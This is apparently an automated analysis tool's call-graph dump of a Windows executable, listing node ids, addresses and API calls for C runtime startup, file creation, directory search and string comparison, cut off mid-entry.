7ff71d30aaf0 __scrt_initialize_onexit_tables __scrt_release_startup_lock 39000->39004 39041 7ff71d30b52c 7 API calls __scrt_fastfail 39001->39041 39003 7ff71d30aba0 39004->38978 39042 7ff71d30ac90 39005->39042 39007 7ff71d30ace9 39007->38985 39009 7ff71d313b2a 39008->39009 39010 7ff71d313b40 39008->39010 39047 7ff71d314f3c 15 API calls _invalid_parameter_noinfo 39009->39047 39049 7ff71d319370 39010->39049 39014 7ff71d313b2f 39048 7ff71d314e1c 31 API calls _invalid_parameter_noinfo 39014->39048 39015 7ff71d313b72 39053 7ff71d3138ec 35 API calls pre_c_initialization 39015->39053 39017 7ff71d30b066 39017->38982 39017->38989 39019 7ff71d313b9c 39054 7ff71d313aa8 15 API calls 2 library calls 39019->39054 39021 7ff71d313bb2 39022 7ff71d313bba 39021->39022 39023 7ff71d313bcb 39021->39023 39055 7ff71d314f3c 15 API calls _invalid_parameter_noinfo 39022->39055 39056 7ff71d3138ec 35 API calls pre_c_initialization 39023->39056 39026 7ff71d313bbf 39027 7ff71d314a74 __free_lconv_mon 15 API calls 39026->39027 39027->39017 39028 7ff71d313be7 39028->39026 39029 7ff71d313c17 39028->39029 39030 7ff71d313c30 39028->39030 39057 7ff71d314a74 39029->39057 39033 7ff71d314a74 __free_lconv_mon 15 API calls 39030->39033 39032 7ff71d313c20 39034 7ff71d314a74 __free_lconv_mon 15 API calls 39032->39034 39033->39026 39035 7ff71d313c2c 39034->39035 39035->39017 39037->38982 39038->38986 39039->38997 39040->38999 39041->39003 39043 7ff71d30acbf 39042->39043 39045 7ff71d30acb5 _onexit 39042->39045 39046 7ff71d314434 34 API calls _onexit 39043->39046 39045->39007 39046->39045 39047->39014 39048->39017 39050 7ff71d31937d 39049->39050 39051 7ff71d313b45 GetModuleFileNameA 39049->39051 39063 7ff71d3191b0 48 API calls 5 library calls 39050->39063 39051->39015 39053->39019 39054->39021 39055->39026 39056->39028 39058 7ff71d314a79 RtlRestoreThreadPreferredUILanguages 39057->39058 39059 7ff71d314aa9 __free_lconv_mon 39057->39059 39058->39059 39060 7ff71d314a94 39058->39060 39059->39032 39064 7ff71d314f3c 15 API calls _invalid_parameter_noinfo 39060->39064 39062 7ff71d314a99 GetLastError 39062->39059 39063->39051 39064->39062 39066 7ff71d313c98 39065->39066 39070 7ff71d313ca1 39065->39070 39066->39070 39071 7ff71d313ccc 39066->39071 39070->38878 39072 7ff71d313ce5 39071->39072 39081 7ff71d313caa 39071->39081 39073 7ff71d319370 pre_c_initialization 48 API calls 39072->39073 39074 7ff71d313cea 39073->39074 39084 7ff71d31978c GetEnvironmentStringsW 39074->39084 39077 7ff71d313cf7 39079 7ff71d314a74 __free_lconv_mon 15 API calls 39077->39079 39079->39081 39080 7ff71d313d04 39082 7ff71d314a74 __free_lconv_mon 15 API calls 39080->39082 39081->39070 39083 7ff71d313e78 17 API calls 2 library calls 39081->39083 39082->39077 39083->39070 39085 7ff71d3197ba WideCharToMultiByte 39084->39085 39095 7ff71d31985e 39084->39095 39087 7ff71d319814 39085->39087 39085->39095 39097 7ff71d314ab4 39087->39097 39088 7ff71d319868 FreeEnvironmentStringsW 39089 7ff71d313cef 39088->39089 39089->39077 39096 7ff71d313d38 31 API calls 4 library calls 39089->39096 39092 7ff71d319824 WideCharToMultiByte 39093 7ff71d31984b 39092->39093 39094 7ff71d314a74 __free_lconv_mon 15 API calls 39093->39094 39094->39095 39095->39088 39095->39089 39096->39080 39098 7ff71d314aff 39097->39098 39099 7ff71d314ac3 __vcrt_getptd_noexit 39097->39099 39104 7ff71d314f3c 15 API calls _invalid_parameter_noinfo 39098->39104 39099->39098 39100 7ff71d314ae6 RtlAllocateHeap 39099->39100 39103 7ff71d3136c0 new 2 API calls 39099->39103 39100->39099 39102 7ff71d314afd 39100->39102 39102->39092 39102->39093 39103->39099 39104->39102 39106 7ff71d2fb496 GetProcAddress 39105->39106 39107 7ff71d2e7e45 39105->39107 39108 7ff71d2fb4ae 39106->39108 39109 7ff71d2fb4cb GetProcAddress 39106->39109 39110 7ff71d2c7a68 39107->39110 39108->39109 39109->39107 39111 7ff71d2c7a76 39110->39111 39131 7ff71d312ae4 39111->39131 39113 7ff71d2c7a80 39114 7ff71d312ae4 setbuf 60 API calls 39113->39114 39115 7ff71d2c7a94 39114->39115 39140 7ff71d2c7b44 GetStdHandle GetFileType 39115->39140 39118 7ff71d2c7b44 3 API calls 39119 7ff71d2c7aae 39118->39119 39120 7ff71d2c7b44 3 API calls 39119->39120 39122 7ff71d2c7abe 39120->39122 39121 7ff71d2c7b12 39130 7ff71d2ccd78 SetConsoleCtrlHandler 39121->39130 39124 7ff71d2c7aeb 39122->39124 39143 7ff71d312abc 31 API calls 2 library calls 39122->39143 39124->39121 39145 7ff71d312abc 31 API calls 2 library calls 39124->39145 39126 7ff71d2c7adf 39144 7ff71d312b40 33 API calls 3 library calls 39126->39144 39127 7ff71d2c7b06 39146 7ff71d312b40 33 API calls 3 library calls 39127->39146 39132 7ff71d312ae9 39131->39132 39133 7ff71d317ee8 39132->39133 39135 7ff71d317f23 39132->39135 39147 7ff71d314f3c 15 API calls _invalid_parameter_noinfo 39133->39147 39149 7ff71d317d98 60 API calls 2 library calls 39135->39149 39136 7ff71d317eed 39148 7ff71d314e1c 31 API calls _invalid_parameter_noinfo 39136->39148 39139 7ff71d317ef8 39139->39113 39141 7ff71d2c7b61 GetConsoleMode 39140->39141 39142 7ff71d2c7a9e 39140->39142 39141->39142 39142->39118 39143->39126 39144->39124 39145->39127 39146->39121 39147->39136 39148->39139 39149->39139 39150 7ff71d31231c 39151 7ff71d31238c 39150->39151 39152 7ff71d312342 GetModuleHandleW 39150->39152 39163 7ff71d316938 EnterCriticalSection 39151->39163 39152->39151 39159 7ff71d31234f 39152->39159 39154 7ff71d316998 fflush LeaveCriticalSection 39155 7ff71d312460 39154->39155 39158 7ff71d31246c 39155->39158 39160 7ff71d312488 11 API calls 39155->39160 39156 7ff71d312410 39156->39154 39157 7ff71d312396 39157->39156 39161 7ff71d3143b8 16 API calls 39157->39161 39159->39151 39164 7ff71d3124d4 GetModuleHandleExW 39159->39164 39160->39158 39161->39156 39165 7ff71d3124fe GetProcAddress 39164->39165 39166 7ff71d312525 39164->39166 39165->39166 39169 7ff71d312518 39165->39169 39167 7ff71d31252f FreeLibrary 39166->39167 39168 7ff71d312535 39166->39168 39167->39168 39168->39151 39169->39166 39170 7ff71d2b3b53 39171 7ff71d2b3b64 39170->39171 39220 7ff71d2d1e80 39171->39220 39172 7ff71d2b3c09 39232 7ff71d2d23f0 39172->39232 39174 7ff71d2b3c18 39237 7ff71d2b8050 157 API calls 39174->39237 39175 7ff71d2b3bb6 39175->39172 39175->39174 39178 7ff71d2b3c01 39175->39178 39177 7ff71d2b3c90 39247 7ff71d2fd400 48 API calls 39177->39247 39180 7ff71d2d1c24 12 API calls 39178->39180 39179 7ff71d2b3c3d 39238 7ff71d2b8010 13 API calls 39179->39238 39180->39172 39182 7ff71d2b3ccc 39182->39177 39245 7ff71d2d2414 61 API calls 39182->39245 39183 7ff71d2b3c45 39186 7ff71d2b3c54 39183->39186 39239 7ff71d2ccba8 75 API calls 39183->39239 39240 7ff71d2ba9d4 186 API calls wcschr 39186->39240 39187 7ff71d2b3cf9 39246 7ff71d2d1998 138 API calls 39187->39246 39191 7ff71d2b3c5c 39241 7ff71d2b93ac 8 API calls 39191->39241 39192 7ff71d2b3d10 39194 7ff71d2d18ac 15 API calls 39192->39194 39194->39177 39195 7ff71d2b3c66 39196 7ff71d2b3c77 39195->39196 39242 7ff71d2cca40 61 API calls _CxxThrowException 39195->39242 39243 7ff71d2b8090 8 API calls 39196->39243 39199 7ff71d2b3c7f 39199->39177 39244 7ff71d2cca40 61 API calls _CxxThrowException 39199->39244 39221 7ff71d2d1e95 setbuf 39220->39221 39222 7ff71d2d1ecb CreateFileW 39221->39222 39223 7ff71d2d1f59 GetLastError 39222->39223 39225 7ff71d2d1fb8 39222->39225 39248 7ff71d2e4534 39223->39248 39227 7ff71d2d1fd9 SetFileTime 39225->39227 39228 7ff71d2d1ff7 39225->39228 39227->39228 39230 7ff71d30a610 _handle_error 8 API calls 39228->39230 39229 7ff71d2d1f78 CreateFileW GetLastError 39229->39225 39231 7ff71d2d203a 39230->39231 39231->39175 39263 7ff71d2d24e8 39232->39263 39235 7ff71d2d240e 39235->39182 39237->39179 39238->39183 39240->39191 39241->39195 39242->39196 39243->39199 39244->39177 39245->39187 39246->39192 39249 7ff71d2e4549 setbuf 39248->39249 39259 7ff71d2e45a2 39249->39259 39260 7ff71d2e472c CharUpperW 39249->39260 39251 7ff71d30a610 _handle_error 8 API calls 39253 7ff71d2d1f74 39251->39253 39252 7ff71d2e4579 39252->39252 39261 7ff71d2e4760 CharUpperW 39252->39261 39253->39225 39253->39229 39255 7ff71d2e4592 39256 7ff71d2e459a 39255->39256 39257 7ff71d2e4629 GetCurrentDirectoryW 39255->39257 39262 7ff71d2e472c CharUpperW 39256->39262 39257->39259 39259->39251 39260->39252 39261->39255 39262->39259 39269 7ff71d2d1af0 39263->39269 39266 7ff71d2d23f9 39266->39235 39268 7ff71d2cca40 61 API calls _CxxThrowException 39266->39268 39268->39235 39270 7ff71d2d1b01 setbuf 39269->39270 39271 7ff71d2d1b6f CreateFileW 39270->39271 39272 7ff71d2d1b68 39270->39272 39271->39272 39273 7ff71d2d1be1 39272->39273 39274 7ff71d2e4534 10 API calls 39272->39274 39277 7ff71d30a610 _handle_error 8 API calls 39273->39277 39275 7ff71d2d1bb3 39274->39275 39275->39273 39276 7ff71d2d1bb7 CreateFileW 39275->39276 39276->39273 39278 7ff71d2d1c14 39277->39278 39278->39266 39279 7ff71d2cca08 10 API calls 39278->39279 39279->39266 39280 7ff71d2fbb70 39283 7ff71d2fbb80 39280->39283 39292 7ff71d2fbae8 39283->39292 39285 7ff71d2fbb79 39287 7ff71d2fbbd5 LeaveCriticalSection 39289 7ff71d2fbae8 67 API calls 39287->39289 39288 7ff71d2fbbc8 SetEvent 39288->39287 39290 7ff71d2fbb97 39289->39290 39290->39285 39297 7ff71d2c1690 39290->39297 39301 7ff71d2fb974 WaitForSingleObject 39292->39301 39295 7ff71d2fbb16 EnterCriticalSection LeaveCriticalSection 39296 7ff71d2fbb12 39295->39296 39296->39290 39298 7ff71d2c16c2 EnterCriticalSection 39297->39298 39300 7ff71d2c16a4 39297->39300 39298->39287 39298->39288 39300->39298 39309 7ff71d2c1180 39300->39309 39302 7ff71d2fb986 GetLastError 39301->39302 39303 7ff71d2fb9b7 39301->39303 39307 7ff71d2cca6c 48 API calls 3 library calls 39302->39307 39303->39295 39303->39296 39305 7ff71d2fb9a6 39308 7ff71d2cca40 61 API calls _CxxThrowException 39305->39308 39307->39305 39308->39303 39310 7ff71d2c11ab 39309->39310 39318 7ff71d2c11b0 39309->39318 39319 7ff71d2c17c8 216 API calls 2 library calls 39310->39319 39312 7ff71d2c166a 39312->39300 39313 7ff71d2e6fe8 216 API calls 39313->39318 39314 7ff71d2e6e90 216 API calls 39314->39318 39315 7ff71d2e6d38 216 API calls 39315->39318 39316 7ff71d2c1080 48 API calls 39316->39318 39318->39312 39318->39313 39318->39314 39318->39315 39318->39316 39320 7ff71d2c17c8 216 API calls 2 library calls 39318->39320 39319->39318 39320->39318 39321 7ff71d2b1884 39453 7ff71d2e34e4 39321->39453 39324 7ff71d2b1926 39326 7ff71d2b195b 39324->39326 39517 7ff71d2e3f98 63 API calls 2 library calls 39324->39517 39325 7ff71d2e34e4 CompareStringW 39327 7ff71d2b18a6 39325->39327 39334 7ff71d2b1970 39326->39334 39518 7ff71d2d2ed8 100 API calls 3 library calls 39326->39518 39328 7ff71d2e34e4 CompareStringW 39327->39328 39333 7ff71d2b18b9 39327->39333 39328->39333 39332 7ff71d2b1915 39516 7ff71d2cca40 61 API calls _CxxThrowException 39332->39516 39333->39324 39515 7ff71d2b1168 8 API calls 2 library calls 39333->39515 39336 7ff71d2b19b8 39334->39336 39519 7ff71d2f49f4 48 API calls 39334->39519 39457 7ff71d2b5450 39336->39457 39338 7ff71d2b19b0 39520 7ff71d2c8444 54 API calls fflush 39338->39520 39344 7ff71d2b72c4 76 API calls 39351 7ff71d2b1a12 39344->39351 39345 7ff71d2b1ae6 39491 7ff71d2b7514 39345->39491 39346 7ff71d2b1b04 39495 7ff71d2c6c94 39346->39495 39349 7ff71d2b1af2 39350 7ff71d2b7514 72 API calls 39349->39350 39352 7ff71d2b1aff 39350->39352 39351->39345 39351->39346 39353 7ff71d30a610 _handle_error 8 API calls 39352->39353 39354 7ff71d2b2f97 39353->39354 39355 7ff71d2b1b13 39511 7ff71d2b7148 39355->39511 39357 7ff71d2b1c71 39358 7ff71d2b1ca7 39357->39358 39359 7ff71d2b63e8 8 API calls 39357->39359 39360 7ff71d2b1cd5 39358->39360 39361 7ff71d2b1ce4 39358->39361 39362 7ff71d2b1c91 39359->39362 39363 7ff71d30a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39360->39363 39364 7ff71d30a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39361->39364 39365 7ff71d2b49b8 99 API calls 39362->39365 39369 7ff71d2b1cee 39363->39369 39364->39369 39366 7ff71d2b1c9d 39365->39366 39367 7ff71d2b63e8 8 API calls 39366->39367 39367->39358 39368 7ff71d2b1d50 39371 7ff71d30a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39368->39371 39369->39368 39370 7ff71d2fde30 72 API calls 39369->39370 39370->39368 39372 7ff71d2b1d62 39371->39372 39373 7ff71d2fdbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39372->39373 39374 7ff71d2b1d7b 39372->39374 39373->39374 39375 7ff71d302bcc 66 API calls 39374->39375 39376 7ff71d2b1dba 39375->39376 39449 7ff71d2dae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39376->39449 39377 7ff71d2b1e1c 39379 7ff71d2b10c0 8 API calls 39377->39379 39381 7ff71d2b1e5d 39377->39381 39378 7ff71d2b1dde std::bad_alloc::bad_alloc 39378->39377 39380 7ff71d30ba34 _CxxThrowException RtlPcToFileHeader RaiseException 39378->39380 39379->39381 39380->39377 39382 7ff71d2ba410 159 API calls 39381->39382 39440 7ff71d2b1ef4 39381->39440 39382->39440 39383 7ff71d2b2ccc 39384 7ff71d2b2d0c 39383->39384 39448 7ff71d2d8c80 72 API calls 39383->39448 39385 7ff71d2fde30 72 API calls 39384->39385 39392 7ff71d2b2d21 39384->39392 39385->39392 39386 7ff71d2d6688 48 API calls 39386->39440 39387 7ff71d2b2d86 39390 7ff71d2f49f4 48 API calls 39387->39390 39427 7ff71d2b2dd0 39387->39427 39388 7ff71d2b5e70 169 API calls 39417 7ff71d2b2005 39388->39417 39389 7ff71d2ba504 208 API calls 39389->39427 39395 7ff71d2b2d9e 39390->39395 39391 7ff71d2b80e4 192 API calls 39391->39427 39392->39387 39394 7ff71d2f49f4 48 API calls 39392->39394 39393 7ff71d2b5928 237 API calls 39393->39417 39396 7ff71d2b2d6c 39394->39396 39397 7ff71d2c8444 54 API calls 39395->39397 39399 7ff71d2f49f4 48 API calls 39396->39399 39400 7ff71d2b2da6 39397->39400 39398 7ff71d2d7c7c 127 API calls 39398->39427 39403 7ff71d2b2d79 39399->39403 39408 7ff71d2d1c24 12 API calls 39400->39408 39401 7ff71d2b1168 8 API calls 39401->39427 39402 7ff71d2bb540 147 API calls 39402->39440 39406 7ff71d2c8444 54 API calls 39403->39406 39404 7ff71d2be6c8 157 API calls 39404->39440 39405 7ff71d2ce21c 63 API calls 39405->39417 39406->39387 39407 7ff71d2ba410 159 API calls 39407->39440 39408->39427 39409 7ff71d2d65b4 48 API calls 39409->39440 39410 7ff71d2fae50 71 API calls 39414 7ff71d2b2e39 39410->39414 39411 7ff71d2d4554 16 API calls 39411->39440 39412 7ff71d2d1998 138 API calls 39412->39440 39413 7ff71d2b33b4 64 API calls 39413->39427 39414->39410 39416 7ff71d2cca40 61 API calls 39414->39416 39414->39427 39415 7ff71d2b5db4 46 API calls 39415->39440 39416->39427 39417->39388 39417->39393 39417->39405 39420 7ff71d2bb540 147 API calls 39417->39420 39417->39440 39443 7ff71d2fb6d0 73 API calls 39417->39443 39445 7ff71d2f49f4 48 API calls 39417->39445 39447 7ff71d2c8444 54 API calls 39417->39447 39418 7ff71d2b6188 231 API calls 39418->39427 39419 7ff71d2b3f74 138 API calls 39419->39427 39420->39417 39421 7ff71d2ccbd0 75 API calls 39421->39440 39422 7ff71d2d7c7c 127 API calls 39422->39440 39423 7ff71d2d1930 11 API calls 39423->39440 39424 7ff71d2eba9c 195 API calls 39424->39427 39425 7ff71d2f49f4 48 API calls 39425->39427 39426 7ff71d2b5004 49 API calls 39426->39440 39427->39389 39427->39391 39427->39398 39427->39401 39427->39413 39427->39414 39427->39418 39427->39419 39427->39424 39427->39425 39429 7ff71d2c8444 54 API calls 39427->39429 39428 7ff71d2d1e80 15 API calls 39428->39440 39429->39427 39430 7ff71d2ba4d0 12 API calls 39430->39440 39431 7ff71d2d18ac 15 API calls 39431->39440 39432 7ff71d2b1168 8 API calls 39432->39440 39433 7ff71d2b571c 12 API calls 39433->39440 39434 7ff71d2fd48c 58 API calls 39434->39440 39435 7ff71d2b5e70 169 API calls 39435->39440 39436 7ff71d2fc0a8 10 API calls 39436->39440 39437 7ff71d2c9be0 14 API calls 39437->39440 39438 7ff71d2d6378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39438->39440 39439 7ff71d2e97f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 39439->39440 39440->39383 39440->39386 39440->39402 39440->39404 39440->39407 39440->39409 39440->39411 39440->39412 39440->39415 39440->39417 39440->39421 39440->39422 39440->39423 39440->39426 39440->39428 39440->39430 39440->39431 39440->39432 39440->39433 39440->39434 39440->39435 39440->39436 39440->39437 39440->39438 39440->39439 39441 7ff71d2d5c0c 237 API calls 39440->39441 39442 7ff71d2d5d40 237 API calls 39440->39442 39444 7ff71d2b6114 216 API calls 39440->39444 39446 7ff71d2d5708 237 API calls 39440->39446 39450 7ff71d2da250 237 API calls 39440->39450 39451 7ff71d2c0d60 237 API calls 39440->39451 39452 7ff71d2daae0 237 API calls 39440->39452 39441->39440 39442->39440 39443->39417 39444->39440 39445->39417 39446->39440 39447->39417 39448->39384 39449->39378 39450->39440 39451->39417 39452->39417 39454 7ff71d2e34f6 39453->39454 39455 7ff71d2b1893 39454->39455 39521 7ff71d2fdac0 CompareStringW 39454->39521 39455->39325 39455->39333 39458 7ff71d2b546f setbuf 39457->39458 39459 7ff71d2b554a __scrt_fastfail 39458->39459 39475 7ff71d2b5588 __scrt_fastfail 39458->39475 39462 7ff71d2fc0a8 10 API calls 39459->39462 39461 7ff71d2b5583 39551 7ff71d2b6eb8 39461->39551 39464 7ff71d2b5576 39462->39464 39465 7ff71d2b681c 54 API calls 39464->39465 39465->39461 39467 7ff71d2b56e9 39558 7ff71d2f6f68 39467->39558 39469 7ff71d2b56f6 39470 7ff71d30a610 _handle_error 8 API calls 39469->39470 39471 7ff71d2b19df 39470->39471 39477 7ff71d2b72c4 39471->39477 39475->39461 39522 7ff71d2b3210 39475->39522 39528 7ff71d2c7088 39475->39528 39532 7ff71d2b681c 39475->39532 39543 7ff71d2f7a24 39475->39543 39562 7ff71d2b571c 39475->39562 39570 7ff71d2c4380 14 API calls 39475->39570 39478 7ff71d2b72eb 39477->39478 39682 7ff71d2c88dc 39478->39682 39480 7ff71d2b7302 39686 7ff71d2e915c 39480->39686 39482 7ff71d2b730f 39698 7ff71d2e7044 39482->39698 39485 7ff71d30a444 new 4 API calls 39486 7ff71d2b73e3 39485->39486 39488 7ff71d2b73f5 __scrt_fastfail 39486->39488 39703 7ff71d2d894c 39486->39703 39489 7ff71d2c9be0 14 API calls 39488->39489 39490 7ff71d2b1a01 39489->39490 39490->39344 39492 7ff71d2b7539 39491->39492 39729 7ff71d2e922c 39492->39729 39496 7ff71d2c6cbc 39495->39496 39499 7ff71d2c6d45 39495->39499 39501 7ff71d2c6cd9 39496->39501 39740 7ff71d2e9f78 8 API calls 2 library calls 39496->39740 39497 7ff71d2c6d83 39497->39355 39498 7ff71d2c6d69 39498->39497 39746 7ff71d2e9f78 8 API calls 2 library calls 39498->39746 39499->39497 39499->39498 39745 7ff71d2e9f78 8 API calls 2 library calls 39499->39745 39502 7ff71d2c6cf3 39501->39502 39741 7ff71d2e9f78 8 API calls 2 library calls 39501->39741 39505 7ff71d2c6d0d 39502->39505 39742 7ff71d2e9f78 8 API calls 2 library calls 39502->39742 39507 7ff71d2c6d2b 39505->39507 39743 7ff71d2e9f78 8 API calls 2 library calls 39505->39743 39507->39497 39744 7ff71d2e9f78 8 API calls 2 library calls 39507->39744 39512 7ff71d2b7162 39511->39512 39513 7ff71d2b7167 39511->39513 39747 7ff71d2b6c64 130 API calls _handle_error 39512->39747 39515->39332 39516->39324 39517->39326 39518->39334 39519->39338 39520->39336 39521->39455 39523 7ff71d2b32e9 39522->39523 39524 7ff71d2b3231 39522->39524 39523->39475 39524->39523 39571 7ff71d2c4380 14 API calls 39524->39571 39526 7ff71d2b329c 39526->39523 39572 7ff71d2d2a20 22 API calls 2 library calls 39526->39572 39529 7ff71d2c70a4 39528->39529 39531 7ff71d2c70c5 39529->39531 39573 7ff71d2d8558 10 API calls 2 library calls 39529->39573 39531->39475 39574 7ff71d2b6714 39532->39574 39534 7ff71d2b6836 39535 7ff71d2b6853 39534->39535 39585 7ff71d3148c0 39534->39585 39535->39475 39538 7ff71d2b68a9 std::bad_alloc::bad_alloc 39593 7ff71d30ba34 RtlPcToFileHeader RaiseException 39538->39593 39540 7ff71d2b68c4 39594 7ff71d2b7188 12 API calls 39540->39594 39542 7ff71d2b68eb 39542->39475 39548 7ff71d2f7a59 39543->39548 39549 7ff71d2f7a4f 39543->39549 39544 7ff71d2f7a7c 39633 7ff71d2fb6d0 73 API calls _Init_thread_footer 39544->39633 39547 7ff71d2f7b1c 60 API calls 39547->39548 39548->39544 39548->39547 39548->39549 39601 7ff71d2f71fc 39548->39601 39634 7ff71d2c41b0 14 API calls 2 library calls 39548->39634 39549->39475 39552 7ff71d2b6ee6 39551->39552 39557 7ff71d2b6f5c 39551->39557 39675 7ff71d2f9f64 8 API calls __BuildCatchObjectHelper 39552->39675 39554 7ff71d2b6efb 39555 7ff71d2b6f2f 39554->39555 39554->39557 39555->39554 39676 7ff71d2b7188 12 API calls 39555->39676 39557->39467 39559 7ff71d2f6fb4 39558->39559 39561 7ff71d2f6f8a 39558->39561 39560 7ff71d2d4538 FindClose 39560->39561 39561->39559 39561->39560 39563 7ff71d2b5742 39562->39563 39565 7ff71d2b575d 39562->39565 39563->39565 39681 7ff71d2e3520 12 API calls 2 library calls 39563->39681 39677 7ff71d2e3610 39565->39677 39568 7ff71d2b57fc 39568->39475 39569 7ff71d2e48bc 8 API calls 39569->39568 39570->39475 39571->39526 39572->39523 39573->39529 39575 7ff71d2b6738 39574->39575 39584 7ff71d2b67a7 __BuildCatchObjectHelper 39574->39584 39576 7ff71d2b6765 39575->39576 39595 7ff71d2cca6c 48 API calls 3 library calls 39575->39595 39579 7ff71d2b6786 39576->39579 39581 7ff71d2b67e1 39576->39581 39578 7ff71d2b6759 39596 7ff71d2ccb64 8 API calls 39578->39596 39579->39584 39597 7ff71d2ccb64 8 API calls 39579->39597 39581->39584 39598 7ff71d2ccb64 8 API calls 39581->39598 39584->39534 39586 7ff71d3148f5 39585->39586 39589 7ff71d2b684b 39585->39589 39586->39589 39599 7ff71d317094 31 API calls 2 library calls 39586->39599 39588 7ff71d314924 39588->39589 39590 7ff71d31492d 39588->39590 39589->39535 39589->39538 39600 7ff71d314e3c 16 API calls abort 39590->39600 39593->39540 39594->39542 39595->39578 39599->39588 39608 7ff71d2f7217 setbuf 39601->39608 39602 7ff71d2f73c5 39641 7ff71d2d45cc 39602->39641 39603 7ff71d30a610 _handle_error 8 API calls 39605 7ff71d2f776f 39603->39605 39605->39548 39607 7ff71d2f729c 39619 7ff71d2f73bb 39607->39619 39621 7ff71d2f732e 39607->39621 39608->39602 39608->39607 39627 7ff71d2f725a 39608->39627 39648 7ff71d2d4554 39608->39648 39609 7ff71d2f7453 39612 7ff71d2f7476 39609->39612 39613 7ff71d2f7464 39609->39613 39611 7ff71d2f76ef 39611->39627 39659 7ff71d2d8558 10 API calls 2 library calls 39611->39659 39629 7ff71d2f7496 39612->39629 39645 7ff71d2d4538 39612->39645 39656 7ff71d2f7c38 55 API calls 3 library calls 39613->39656 39614 7ff71d2f7342 39614->39611 39614->39627 39630 7ff71d2f7656 39614->39630 39657 7ff71d2c4380 14 API calls 39614->39657 39617 7ff71d2f7471 39617->39612 39635 7ff71d30a444 39619->39635 39621->39614 39623 7ff71d2f734a 39621->39623 39624 7ff71d2f737e 39623->39624 39623->39627 39654 7ff71d2c4380 14 API calls 39623->39654 39624->39627 39655 7ff71d2ccbd0 75 API calls 39624->39655 39625 7ff71d2d4554 16 API calls 39625->39627 39627->39603 39629->39625 39629->39627 39630->39611 39630->39627 39630->39630 39631 7ff71d2f7723 39630->39631 39658 7ff71d2bc214 8 API calls 2 library calls 39631->39658 39634->39548 39638 7ff71d30a44f 39635->39638 39636 7ff71d30a47a 39636->39602 39637 7ff71d3136c0 new 2 API calls 39637->39638 39638->39636 39638->39637 39660 7ff71d30b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 39638->39660 39661 7ff71d30b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 39638->39661 39644 7ff71d2d45ed 39641->39644 39642 7ff71d2d46b2 39642->39609 39642->39614 39643 7ff71d2d46ec 15 API calls 39643->39644 39644->39642 39644->39643 39646 7ff71d2d454f 39645->39646 39647 7ff71d2d4549 FindClose 39645->39647 39646->39629 39647->39646 39649 7ff71d2d4570 39648->39649 39653 7ff71d2d4574 39649->39653 39662 7ff71d2d46ec 39649->39662 39652 7ff71d2d458d FindClose 39652->39653 39653->39607 39654->39624 39655->39627 39656->39617 39657->39630 39658->39627 39659->39627 39663 7ff71d2d4705 setbuf 39662->39663 39664 7ff71d2d4733 FindFirstFileW 39663->39664 39665 7ff71d2d47a4 FindNextFileW 39663->39665 39667 7ff71d2d4749 39664->39667 39674 7ff71d2d478b 39664->39674 39666 7ff71d2d47ae GetLastError 39665->39666 39665->39674 39666->39674 39668 7ff71d2e4534 10 API calls 39667->39668 39669 7ff71d2d475b 39668->39669 39671 7ff71d2d475f FindFirstFileW 39669->39671 39672 7ff71d2d477a GetLastError 39669->39672 39670 7ff71d30a610 _handle_error 8 API calls 39673 7ff71d2d4587 39670->39673 39671->39672 39671->39674 39672->39674 39673->39652 39673->39653 39674->39670 39675->39554 39676->39555 39679 7ff71d2e3626 setbuf wcschr 39677->39679 39678 7ff71d30a610 _handle_error 8 API calls 39680 7ff71d2b57e1 39678->39680 39679->39678 39680->39568 39680->39569 39681->39565 39683 7ff71d2c8919 39682->39683 39708 7ff71d2f4b14 39683->39708 39685 7ff71d2c8954 __scrt_fastfail 39685->39480 39687 7ff71d2e9199 39686->39687 39688 7ff71d30a480 4 API calls 39687->39688 39689 7ff71d2e91be 39688->39689 39690 7ff71d30a444 new 4 API calls 39689->39690 39691 7ff71d2e91cf 39690->39691 39692 7ff71d2e91e1 39691->39692 39693 7ff71d2c88dc 8 API calls 39691->39693 39694 7ff71d30a444 new 4 API calls 39692->39694 39693->39692 39695 7ff71d2e91f7 39694->39695 39696 7ff71d2e9209 39695->39696 39697 7ff71d2c88dc 8 API calls 39695->39697 39696->39482 39697->39696 39699 7ff71d2c88dc 8 API calls 39698->39699 39700 7ff71d2e7063 39699->39700 39701 7ff71d2e72c0 4 API calls 39700->39701 39702 7ff71d2b7325 39701->39702 39702->39485 39702->39488 39713 7ff71d2f7d80 39703->39713 39709 7ff71d2f4b26 39708->39709 39710 7ff71d2f4b2b 39708->39710 39712 7ff71d2f4b38 8 API calls _handle_error 39709->39712 39710->39685 39712->39710 39720 7ff71d2f8094 39713->39720 39716 7ff71d2d8a44 39717 7ff71d2d8a5a __scrt_fastfail 39716->39717 39724 7ff71d2fbac4 39717->39724 39721 7ff71d2f809f 39720->39721 39722 7ff71d2f7ec8 68 API calls 39721->39722 39723 7ff71d2d896e 39722->39723 39723->39716 39727 7ff71d2fba70 GetCurrentProcess GetProcessAffinityMask 39724->39727 39728 7ff71d2d89c5 39727->39728 39728->39488 39732 7ff71d2e9245 39729->39732 39731 7ff71d2e92b1 39738 7ff71d2d6194 72 API calls 39731->39738 39737 7ff71d2d6194 72 API calls 39732->39737 39734 7ff71d2e92bd 39739 7ff71d2d6194 72 API calls 39734->39739 39736 7ff71d2e92c9 39737->39731 39738->39734 39739->39736 39740->39501 39741->39502 39742->39505 39743->39507 39744->39499 39745->39498 39746->39497 39747->39513 39748 7ff71d312450 39755 7ff71d313734 39748->39755 39750 7ff71d312455 39751 7ff71d316998 fflush LeaveCriticalSection 39750->39751 39752 7ff71d312460 39751->39752 39753 7ff71d31246c 39752->39753 39754 7ff71d312488 11 API calls 39752->39754 39754->39753 39760 7ff71d315630 GetLastError 39755->39760 39757 7ff71d31373f 39780 7ff71d314a1c 35 API calls abort 39757->39780 39761 7ff71d315652 39760->39761 39762 7ff71d31564d 39760->39762 39767 7ff71d31569b 39761->39767 39782 7ff71d314b14 15 API calls 3 library calls 39761->39782 39781 7ff71d316cf4 6 API calls __vcrt_uninitialize_ptd 39762->39781 39765 7ff71d315669 39766 7ff71d315671 39765->39766 39783 